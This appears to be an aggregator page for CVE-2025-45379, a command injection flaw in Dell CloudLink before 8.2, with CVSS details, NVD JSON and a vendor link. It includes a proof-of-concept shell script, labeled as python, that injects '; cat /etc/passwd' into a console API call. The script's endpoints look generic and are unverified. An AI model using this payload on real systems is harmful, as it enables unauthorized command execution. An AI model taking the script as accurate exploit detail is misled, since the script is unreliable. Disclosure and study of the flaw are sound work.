Security Vulnerability Report
中文
CVE-2025-45379 CVSS 8.4 HIGH

CVE-2025-45379

Published: 2025-11-05 17:15:42
Last Modified: 2025-11-07 17:52:47

Description

Dell CloudLink, versions prior to 8.2, contain a vulnerability where a privileged user with known password can run command injection from console to gain shell access of system.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:* - VULNERABLE
Dell CloudLink < 8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-45379 PoC - Dell CloudLink Command Injection # Requires authenticated privileged user access TARGET_HOST="target.dellcloudlink.local" USERNAME="admin" PASSWORD="known_password" # Construct malicious command payload PAYLOAD="; cat /etc/passwd > /tmp/pwned.txt" # Login to Dell CloudLink console curl -k -c cookies.txt -d "username=$USERNAME&password=$PASSWORD" \ "https://$TARGET_HOST/api/login" # Execute command injection payload curl -k -b cookies.txt \ -d "command=show_status$PAYLOAD" \ "https://$TARGET_HOST/api/console/execute" echo "Check /tmp/pwned.txt on target system for proof of command execution"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-45379", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:41.520", "lastModified": "2025-11-07T17:52:47.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell CloudLink, versions prior to 8.2, contain a vulnerability where a privileged user with known password can run command injection from console to gain shell access of system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:cloudlink:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.2", "matchCriteriaId": "5DDB135B-8DE5-4071-B2BC-0DE3846F682F"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}